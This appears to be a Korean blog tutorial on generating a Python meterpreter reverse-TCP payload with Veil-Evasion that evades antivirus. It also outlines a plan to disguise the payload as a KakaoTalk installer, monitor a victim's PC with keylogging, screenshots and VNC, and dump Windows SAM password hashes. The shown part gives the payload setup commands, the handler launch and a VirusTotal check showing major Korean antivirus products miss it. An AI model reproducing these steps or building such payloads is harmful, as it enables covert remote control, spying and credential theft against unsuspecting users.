반응형




안녕들 하시죠 !


이번시간에는 Veil-evasion을 이용하여 백신에 탐지되지 않는 악성코드를 만들어보겠습니다.


1. Veil-evasion을 이용해 악성코드 제작.

2. Virustotal로 악성코드 검사.

3. 카카오톡 설치파일과 악성코드를 합치고 아이콘수정.

4. 피해자PC에서 악성코드 실행 후, migrate명령어로 프로세스 숨기기.

5.  keyscan, 엑셀 파일 업,다운로드, screenshot, run vnc로 피해자PC 감시.

6. 권한상승, 윈도우 SAM파일에 저장되어있는 패스워드 dump뜨기.


이러한 순서로 진행해보겠습니다.



Veil-Evasion.py를 클릭해 실행시키겠습니다.



41개의 payload를 가지고있는 Veil-evasion이 실행됬네요.

list를 입력해 페이로드를 보겠습니다.



meterpreter는 os에 상관없이 장악한 피씨가 어떤 종류건 간에 공격자가 자주 사용하는 시스템 명령어를 예약시켜놓고있습니다.

그래서 윈도우 명령어를 몰라도 되는 장점이 있습니다.

python/meterpreter/rev_tcp 라고 되어있는 27번을 사용하겠습니다.


c/meterpreter/rev_tcp를 선택해도 되겠지만, C를 사용하면 백신에 걸려버리기때문에 python을 이용해 만들겠습니다.


use 27을 입력하겠습니다.



자, 이제 set LHOST [ 본인 kali ip ], set LPORT [ 임의의 포트 ] 를 입력하고 확인을 위해 info 들어가겠습니다.



잘 입력이 되었네요.

이제 generate를 입력하겠습니다.




위에 hongpossible은 악성코드명,

1 - Pyinstaller ( default ) 는 피해자PC에 파이썬을 깔고 악성코드를 실행시켜주겠다. 라는건데 이것때문에 잡히기도 한답니다.



* 도중에 오류로 vm을 바꿔 진행하여 ip주소가 다르게 나옵니다.


주황색 부분의 악성코드경로를 복사합니다.



Ctrl + Shift + T를 눌러 새 터미널을 띄우고,

cp /usr/share/veil-output/compiled/hongpossible.exe /root/Desktop/ 을 입력해 바탕화면 경로로 악성코드 복사.



이제 드디어 핸들러를 띄우기위해 리소스파일 경로를 복사하겠습니다.



터미널 새창에서, 

msfconsole -r /usr/share/veil-output/handlers/hongpossible_handler.rc


* 이 과정에서 아래와 같은 오류가 나면 따라해보세요.

위와 같은 오류가 뜨면, 주황색 부분을 복사하세요.

vi /opt/metasploit/apps/pro/msf3/lib/msf/core/payload/dalvik.rb
그다음 :set nu 를 입력하겠습니다.


:62 를 입력해 62번째 줄로 가겠습니다.


62번째 줄의 3600*24*365*20 에서 20을 2로 바꿔주겠습니다.

3600*24*365*2

:wq로 저장하고 빠져나가시면 됩니다.



자, 이제 핸들러가 정상적으로 켜졌습니다.


그럼이제 Virustotal로 이동해 제가만든 hongpossible.exe 악성코드에 대해 검사해보겠습니다.






국내 유명 백신 V3와 ALYac에는 탐지 되지 않고있네요 !


글이 너무 길어지는 관계로 다음시간에 카카오톡 설치파일과 악성코드를 merge하는 부분부터 이어서 진행하겠습니다. 감사합니다 !




+ Recent posts